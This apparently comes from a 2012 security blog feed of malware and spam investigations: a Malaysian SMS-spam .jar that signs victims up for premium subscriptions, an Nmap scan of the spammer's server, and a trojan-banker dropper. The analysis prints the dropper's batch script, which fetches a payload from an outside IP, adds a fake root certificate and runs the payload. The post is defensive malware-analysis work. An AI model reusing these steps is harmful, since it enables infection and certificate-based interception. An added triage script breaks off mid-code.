<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjsBjPIKNrYHD3rMq_xJ1Nhyphenhyphen-z9LJn2fUZgeM0NCwIR7Wks8aUzORpMq8aQ-QpzwFYeReP1LfX5qo1msrYp2UrsIm83cxO96y3aOx7ZRQWOE5JNAwzY-9QHBfUZkWa3mdyEdpOspSbQf8/s1600/twitterspam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjsBjPIKNrYHD3rMq_xJ1Nhyphenhyphen-z9LJn2fUZgeM0NCwIR7Wks8aUzORpMq8aQ-QpzwFYeReP1LfX5qo1msrYp2UrsIm83cxO96y3aOx7ZRQWOE5JNAwzY-9QHBfUZkWa3mdyEdpOspSbQf8/s400/twitterspam.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is another example screenshot. Most of those spammer accounts look like this.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-38780362283070069752012-09-02T02:04:00.000+08:002012-09-04T10:33:32.422+08:00
Investigation behind Malaysian SMS spam with .jar attachment (0195451395).
I constantly received SMS spam messages with a .jar attachment. This happened several times within 3 months, so I decided to do some digging into who is behind this activity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZNluPkruUAeYaFwJGhLeFM9FvHOHJwIcSh-6CBQt_EaTHAVL1TqJ8uNmAKKrA-fZnA8lcLKGhIg3OzC0djJGX2EoaaEOzO1emPZmwhdhP6ymJkRxWjZFXHoY0i_ZYuPXQjwwMRXV2jVU/s1600/20120901_231157.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZNluPkruUAeYaFwJGhLeFM9FvHOHJwIcSh-6CBQt_EaTHAVL1TqJ8uNmAKKrA-fZnA8lcLKGhIg3OzC0djJGX2EoaaEOzO1emPZmwhdhP6ymJkRxWjZFXHoY0i_ZYuPXQjwwMRXV2jVU/s400/20120901_231157.jpg" width="400" /></a></div>
<br />
The phone number used by the spammer:<br />
+6019-5451395 (several other phone numbers may be used)<br />
<br />
The SMS message contains a URL that redirects to another server providing a download link:<br />
hxxp://bit.ly/RuMmBi ---> hxxp://203.223.148.215/R340.jar<br />
<br />
The .jar file looks suspicious; promoting something with such an attachment is an inappropriate practice. Let's try to access IP 203.223.148.215 with a browser.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOy8G14c34b2V4jDCNWkzh2xKLGAPKE483k2hLJKUtZstNm0ew3VTyGJuCMWEQrt0lb0iFtEmDncfVkfAhrxqP5MHGaOqeW8OBDM0CczYW5_k5RPjOFYOt3YXF6Glo85onj9s2hP3Es8/s1600/sms-spam1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEOy8G14c34b2V4jDCNWkzh2xKLGAPKE483k2hLJKUtZstNm0ew3VTyGJuCMWEQrt0lb0iFtEmDncfVkfAhrxqP5MHGaOqeW8OBDM0CczYW5_k5RPjOFYOt3YXF6Glo85onj9s2hP3Es8/s400/sms-spam1.png" width="400" /></a></div>
<br />
The IP 203.223.148.215 resolves to the domain name www.smsgateway.cc. It seems to be running IIS on a Windows machine. Now let's run Nmap on it.<br />
<br />
<pre class="brush: shell">Host is up (0.011s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp filtered smtp
80/tcp open http Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: 403 - Forbidden: Access is denied.
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1026/tcp filtered LSA-or-nterm
1027/tcp filtered IIS
1433/tcp open ms-sql-s Microsoft SQL Server 2008
2383/tcp open ms-olap4?
3389/tcp open microsoft-rdp Microsoft Terminal Service
4444/tcp filtered krb524
6129/tcp filtered unknown
6667/tcp filtered irc
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servi
t.cgi :
SF-Port1433-TCP:V=5.51%I=7%D=9/1%Time=50421EB0%P=i686-pc-windows-windows%r
SF:(ms-sql-s,25,"\x04\x01\0%\0\0\x01\0\0\0\x15\0\x06\x01\0\x1b\0\x01\x02\0
SF:\x1c\0\x01\x03\0\x1d\0\0\xff\n2\x06@\0\0\0\0");
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista (94%), FreeBSD 6.X (86%)
Aggressive OS guesses: Microsoft Windows Server 2008 SP2 (94%), Microsoft Windows 7 (94%), Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7 (94
oft Windows Server 2008 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 Professional (93%), Microsoft Windows Server 2008 Beta 3 (93%), Micro
ws 7 Ultimate (92%), Microsoft Windows Vista Business SP1 (91%), Microsoft Windows Vista Home Premium SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
Service Info: OS: Windows
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 8.00 ms 60.53.173.202
2 5.00 ms 115.132.110.213
3 5.00 ms 115.132.110.213
4 8.00 ms 10.55.36.118
5 12.00 ms ge-0-1.edge-gw-1-kul-sip.my.globaltransit.net (61.11.210.174)
6 11.00 ms 203.223.148.215
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds
</pre>
<br />
<br />
Well, the following are the only ports that can be accessed from the public internet:
<br />
<pre class="brush: shell">21/tcp Microsoft ftpd
80/tcp Microsoft IIS httpd 7.5
1433/tcp Microsoft SQL Server 2008
2383/tcp ms-olap4?
3389/tcp microsoft-rdp Microsoft Terminal Service
49152/tcp Microsoft Windows RPC
49153/tcp Microsoft Windows RPC
49154/tcp Microsoft Windows RPC
49155/tcp Microsoft Windows RPC
49160/tcp Microsoft Windows RPC
49161/tcp Microsoft Windows RPC
</pre>
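As an added example that is not part of the original post, here is a small parser for Nmap's normal-output port table. Run over the scan text above it reproduces the public-port list just given and annotates which of the open services represent exposure on an internet-facing Windows host; the risk notes are my own classification, not Nmap's.

```python
import re

# One Nmap normal-output port line, e.g. "80/tcp open http Microsoft IIS httpd 7.5".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp|sctp)\s+"
    r"(?P<state>open\|filtered|open|closed|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.+))?$"
)

# Open services I would call out on an internet-facing Windows host
# (my own classification, not part of the post).
EXPOSED_NOTES = {
    21: "FTP: credentials travel in cleartext",
    1433: "SQL Server reachable from the internet",
    2383: "SQL Server Analysis Services reachable from the internet",
    3389: "RDP management interface exposed",
}


def parse_nmap(text):
    """Return one dict per port line; headers, NSE output and traceroute are skipped."""
    rows = []
    for raw in text.splitlines():
        m = PORT_LINE.match(raw.strip())
        if not m:
            continue
        rows.append({
            "port": int(m["port"]),
            "proto": m["proto"],
            "state": m["state"],
            "service": m["service"],
            "version": (m["version"] or "").strip(),
        })
    return rows


def open_ports(rows):
    return [r["port"] for r in rows if r["state"] == "open"]


def by_state(rows):
    counts = {}
    for r in rows:
        counts[r["state"]] = counts.get(r["state"], 0) + 1
    return counts


def exposure_notes(rows):
    """(port, note) for each open port worth raising with the host owner."""
    notes = []
    for r in rows:
        if r["state"] != "open":
            continue
        if r["port"] in EXPOSED_NOTES:
            notes.append((r["port"], EXPOSED_NOTES[r["port"]]))
        elif r["service"] == "msrpc" and r["port"] >= 49152:
            notes.append((r["port"], "dynamic RPC endpoint exposed"))
    return notes


# Port table copied from the scan output shown above (trimmed to the parts
# that exercise the parser: headers, script output and port lines).
SCAN_OUTPUT = """\
Host is up (0.011s latency).
Not shown: 979 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp filtered smtp
80/tcp open http Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1026/tcp filtered LSA-or-nterm
1027/tcp filtered IIS
1433/tcp open ms-sql-s Microsoft SQL Server 2008
2383/tcp open ms-olap4?
3389/tcp open microsoft-rdp Microsoft Terminal Service
4444/tcp filtered krb524
6129/tcp filtered unknown
6667/tcp filtered irc
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Network Distance: 6 hops
"""

if __name__ == "__main__":
    rows = parse_nmap(SCAN_OUTPUT)
    print("open:", open_ports(rows))
    print("states:", by_state(rows))
    for port, note in exposure_notes(rows):
        print(f"{port}/tcp: {note}")
```

Nmap's `-oN` output is what this parses; for anything beyond a one-off triage, `-oX` and an XML parser are the robust route, since the normal-output columns are free text.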
<br />
Now we need to take a look at the .jar file. First of all, let's see how it looks when running on a phone. In this case I used the Nokia emulator.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO6TyOGkgYxjHpIic_FhNlFakHjgPaESEZOrLJV_85T04xbyqI1169UTPAvxJqnmY6BWvOfaztrGxOEHmK-VyZ3xoW-3COLd91o6d_LaNoQ7a973userlikDqkGblVeoQXlrZU-kpVxI/s1600/sms-spam3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSO6TyOGkgYxjHpIic_FhNlFakHjgPaESEZOrLJV_85T04xbyqI1169UTPAvxJqnmY6BWvOfaztrGxOEHmK-VyZ3xoW-3COLd91o6d_LaNoQ7a973userlikDqkGblVeoQXlrZU-kpVxI/s640/sms-spam3.png" width="313" /></a></div>
<br />
Once the victim runs the spam app, it instantly pops up a prompt to send a message to the number 33375. If the user clicks/taps the Yes button, it automatically subscribes them for RM3.00 to further spam content. Their credit will be 'stolen' at RM3.00 monthly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_NmpC9hHgyQ22GgPl2HZ373ZIjqzYCJvd4Sr_Jyj8Cu9n9v4b-DTde-cucoBA8Kjdek4kiaGF2q0oxF-vJ5C9vPO9K0Ni8gxJUaZasRtTBRu9eLH4db1sW_YzEcTht6Dkn5s_7HY9VdU/s1600/sms-spam6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_NmpC9hHgyQ22GgPl2HZ373ZIjqzYCJvd4Sr_Jyj8Cu9n9v4b-DTde-cucoBA8Kjdek4kiaGF2q0oxF-vJ5C9vPO9K0Ni8gxJUaZasRtTBRu9eLH4db1sW_YzEcTht6Dkn5s_7HY9VdU/s400/sms-spam6.png" width="400" /></a></div>
<br />
The detailed SMS traffic is shown in the image above. Let's take a look at the .jar source code below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ZLc8qkXoI6C2EU84NELrY6JVXXF7XdYxkq9weGbud__mqb3Zm5whMtnsx0ixosBRyznfWoRM_KZrPTlc3bczSavrJbSZRie8TiYrlC7mAMszn424E3ZT-WX3yxre1MDCm6RQUlaGRD8/s1600/sms-spam4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0ZLc8qkXoI6C2EU84NELrY6JVXXF7XdYxkq9weGbud__mqb3Zm5whMtnsx0ixosBRyznfWoRM_KZrPTlc3bczSavrJbSZRie8TiYrlC7mAMszn424E3ZT-WX3yxre1MDCm6RQUlaGRD8/s400/sms-spam4.png" width="400" /></a></div>
<br />
The variables <i>paramString1</i> and <i>paramString3</i> correspond to values in the manifest file.<br />
<br />
If we look at the 'c' class in the source code, there is another shortened link that redirects to their Terms and Conditions web page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0f_mhmCl5reeSw0yZ2VsUAQpA-IYO6KPlSai183mKHveatD7v8t3BthJ9-ipl1rEYTBi9rGA5PADNQ2jwlTuwYyPRj_PYDO06gltb4O-Ov6zCLbmiRPU5yliR3IDFDAhT9ED4xwJM2g/s1600/sms-spam5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0f_mhmCl5reeSw0yZ2VsUAQpA-IYO6KPlSai183mKHveatD7v8t3BthJ9-ipl1rEYTBi9rGA5PADNQ2jwlTuwYyPRj_PYDO06gltb4O-Ov6zCLbmiRPU5yliR3IDFDAhT9ED4xwJM2g/s400/sms-spam5.png" width="400" /></a></div>
<br />
The shortened link redirects as follows:<br />
hxxp://bit.ly/Mubvpe ---> hxxp://progain.smsgateway.cc/tnc.html
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMCKU0rd_zlJJMYOzbb4tAwv9eFLX_5J7EY3baWDQFN9mH6GR3DhxkFn0gEhbLg-RoSI3T8asy2EVdHChEIoyzfvCurc5RHd0WeCqahqaEAcbcMIrU4FwJMzv1wMee0iMWmtVwOcvz2_A/s1600/sms-spam7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMCKU0rd_zlJJMYOzbb4tAwv9eFLX_5J7EY3baWDQFN9mH6GR3DhxkFn0gEhbLg-RoSI3T8asy2EVdHChEIoyzfvCurc5RHd0WeCqahqaEAcbcMIrU4FwJMzv1wMee0iMWmtVwOcvz2_A/s400/sms-spam7.png" width="400" /></a></div>
<br />
Based on their TnC, it seems that <b>Million Progain Sdn Bhd (916763-X)</b> is responsible for receiving payment from the user. Several TnC have also been violated by this company. I'll keep the details about this company, as it seems to lead to more abusive services.<br />
<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-3642419151847160302012-08-26T21:01:00.001+08:002012-08-26T21:06:41.613+08:00
Whatsapp Hoax Message Still in Circulation<div class="separator" style="clear: both; text-align: justify;">
It seems that a viral message with hoax content is still circulating on my WhatsApp. It has been a few months since its first appearance in January 2012. Hopefully there will be no more forwarded messages like this.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgck2t6eHmnIzEHFQnUoU5ezZYsrBfXfmSlvJbdxXcPo5jnLNgy6toYQmytNMwolJ9gU4LFNw8I5gv8V_vOUbQNlyfhp7O9kFEn6BgFf0E2h5kmeR31XkiEZtIp9Qis5QQVmrxMeVTZggs/s1600/20120826_204608.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgck2t6eHmnIzEHFQnUoU5ezZYsrBfXfmSlvJbdxXcPo5jnLNgy6toYQmytNMwolJ9gU4LFNw8I5gv8V_vOUbQNlyfhp7O9kFEn6BgFf0E2h5kmeR31XkiEZtIp9Qis5QQVmrxMeVTZggs/s400/20120826_204608.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Full hoax message:</div>
<blockquote class="tr_bq">
Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo</blockquote>
<div>
<br /></div>
<div>
WhatsApp has already announced on their blog that this is really a hoax. <a href="http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/">http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/</a></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-80744795522921795502012-08-14T16:46:00.000+08:002012-08-14T19:58:50.244+08:00
Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)<div class="separator" style="clear: both; text-align: justify;">
Yesterday, I found that a local website had been compromised and embedded with malicious code. Once a user visits the website and allows the Java applet, the malware is downloaded and installed.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-ZsoQevhGiRm8K2duY1IXUfIF0JHzjIcOEu4dxVQpTmi45QzsE82PjrYCGWsvj_n0KwmgJibKwLPAclotafZ2GmyBQkGauP9sDUopnFgv19TZuERIb5QKF81Yumb4c9kh79Xt-iq5C_M/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-ZsoQevhGiRm8K2duY1IXUfIF0JHzjIcOEu4dxVQpTmi45QzsE82PjrYCGWsvj_n0KwmgJibKwLPAclotafZ2GmyBQkGauP9sDUopnFgv19TZuERIb5QKF81Yumb4c9kh79Xt-iq5C_M/s400/1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The picture above shows that you are prompted to use the Java plug-in for some 'features' on this website. Let's take a look at the webpage source code. The red highlight in the picture below is a Windows batch command that drops a VBScript file, which then downloads another piece of malware (a Windows executable) from an Israeli website. That website has possibly also been compromised.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0w6iSldvRXTRRRxfkQdju-g5BLWMYGJtDMSb8AZ6yvzzMm5JVPD9A6KnBZb-Qn1k7yaeu8OMh1YIAVN628d41Jeu7QKq1yGX7N8ofLmzpkE24wr91-ayJEFsMRQD8wlRM4AhAn8_9Jjs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0w6iSldvRXTRRRxfkQdju-g5BLWMYGJtDMSb8AZ6yvzzMm5JVPD9A6KnBZb-Qn1k7yaeu8OMh1YIAVN628d41Jeu7QKq1yGX7N8ofLmzpkE24wr91-ayJEFsMRQD8wlRM4AhAn8_9Jjs/s400/2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As we can see, extra code has been embedded in the main page of the website. At the top it calls the Java applet (Dantas.jar), which runs the Windows batch command. Below is the Java applet code.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2Pv1Q_jCM_HW3QxikWD2odS9sVhbfEyx1uMeViZFhAQZrKxqq8239UokFeDMyvm_yc6PkeihbRP99ZP1_m3XBtNgelSUuz1tgkIXHyEVUN8S0U7UArRiJZaf04NoLj7t_lTlSmf4KZww/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2Pv1Q_jCM_HW3QxikWD2odS9sVhbfEyx1uMeViZFhAQZrKxqq8239UokFeDMyvm_yc6PkeihbRP99ZP1_m3XBtNgelSUuz1tgkIXHyEVUN8S0U7UArRiJZaf04NoLj7t_lTlSmf4KZww/s400/4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
If the Windows batch command executes successfully, it saves the VBScript code into the Windows temporary directory as eden.vbs, then runs eden.vbs to download and execute the malware executable.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AZq0B2q60wE9DMGzt0JU19ZBDLYy8bYQ70RiTvu4n9332VcOQPXyBfTm3gPSbQZQkMZyR9rxeYOz6vAlWexrpQbz1aVLJit10C0PyLpFVqRw0qH53qY5TyikoNibeVFRppveoo9LwoI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3AZq0B2q60wE9DMGzt0JU19ZBDLYy8bYQ70RiTvu4n9332VcOQPXyBfTm3gPSbQZQkMZyR9rxeYOz6vAlWexrpQbz1aVLJit10C0PyLpFVqRw0qH53qY5TyikoNibeVFRppveoo9LwoI/s400/3.png" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
Some scam pharma (viagra) hyperlinks have also been embedded at the bottom of the website.</div>
<br />
<div class="separator" style="clear: both; text-align: justify;">
Now we need to take a closer look at the PE file downloaded from the following link:</div>
<div class="separator" style="clear: both; text-align: justify;">
hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The PE file is actually an SFX archive containing several files, including a certificate from the malware author.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNWo10vJkUhF2_UMKrSlq5EAd1ouQqpR3glt5Bv9RpnQhJiu6zV8EP8WVX0UtGNZZxlznnSioCeUyzIYXW0SeWmbHdeRDHDvUrETKPXvNB5xgPNgqkRAjV6TpIGMnP38Zs6O1lWu3s9c/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNWo10vJkUhF2_UMKrSlq5EAd1ouQqpR3glt5Bv9RpnQhJiu6zV8EP8WVX0UtGNZZxlznnSioCeUyzIYXW0SeWmbHdeRDHDvUrETKPXvNB5xgPNgqkRAjV6TpIGMnP38Zs6O1lWu3s9c/s400/5.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<table border="1px">
<tbody>
<tr>
<td><b>FileName</b></td>
<td><b>MD5</b></td>
<td><b>Desc.</b></td>
</tr>
<tr>
<td>certadm.dll</td>
<td>AED39116FE12C5550975043DA1D1B244</td>
<td>Microsoft Certificate Services Admin</td>
</tr>
<tr>
<td>certnew.cer</td>
<td>2B742FEB1883EE5CB418B1CBAB145A7D</td>
<td><b><span style="color: red;">Fake Security Certificate</span></b></td>
</tr>
<tr>
<td>certutil.exe</td>
<td>711DB2EF10B6C2AB2080698AEC6C6D08</td>
<td>Cert Util.exe</td>
</tr>
<tr>
<td>givetome.exe</td>
<td>6D2C398E03397C9D089EDC0F00AB3FCB</td>
<td>http://noeld.com/programs.asp</td>
</tr>
<tr>
<td>jeovahjireh.exe</td>
<td>0B2BF362548B244477D9FFB613AF54D4</td>
<td><span style="color: red;"><b>Malware</b></span></td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The only suspicious file is 'jeovahjireh.exe', so we need to take a closer look at it. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe binder; inside it is a Windows batch script.</div>
<div class="separator" style="clear: both; text-align: justify;">
</div>
<pre class="brush:php">@shift
@break off
echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
set inf=0
set exe="%temp%\msavc.exe"
if exist %temp%\%USERNAME%.dll goto mapa
> %temp%\%USERNAME%.dll echo y
:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"
del "%temp%\leiame.txt"
ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer
cmd.exe /c "%exe%"
del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe
echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
. . .
echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat</pre>
<br />
<div class="separator" style="clear: both; text-align: justify;">
The code is a bit lengthy and semi-obfuscated. Most of it is useless; I cut out some of the junk code.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
What the batch script actually does is download another PE file from the following URL:</div>
<div class="separator" style="clear: both; text-align: justify;">
hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
The *.jip file is saved in the temp directory as 'msavc.exe'. After that, the script uses certutil to add the bundled 'certnew.cer' certificate to the infected machine's root certificate store.</div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTdKLwIs_K6Q9RKWC7fYObxOaCQSxCcEDiEib_7xmIwtknn_AcXaJINbz5fW5JGRrb0qrZlHJG6L3yGcppM62wGsb2l-48X-GsgCyGNyWu_Gp5jG0byTKjOrAs2eXP5uFTChdli6MZ85M/s1600/cert12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTdKLwIs_K6Q9RKWC7fYObxOaCQSxCcEDiEib_7xmIwtknn_AcXaJINbz5fW5JGRrb0qrZlHJG6L3yGcppM62wGsb2l-48X-GsgCyGNyWu_Gp5jG0byTKjOrAs2eXP5uFTChdli6MZ85M/s400/cert12.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
Then it executes 'msavc.exe' via cmd.exe. Finally, all the bundled files are deleted (certnew.cer, certadm.dll, certutil.exe, givetome.exe).</div>
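As an added example (not part of the original post), the following Python script triages a dropper batch file of the kind shown above: it strips the junk `echo ... >> %temp%\*.dat.dat` padding lines, resolves the script's own `set` variables, and reports the sequence the analysis walks through (download to %temp%, certutil root-store install, execution of the dropped file, cleanup). The sample batch text is constructed to mirror the structure of the post's script, with a placeholder URL.

```python
import re

# Constructed sample, modelled on the dropper script in the post.
# The download URL is a placeholder; the rest follows the same structure.
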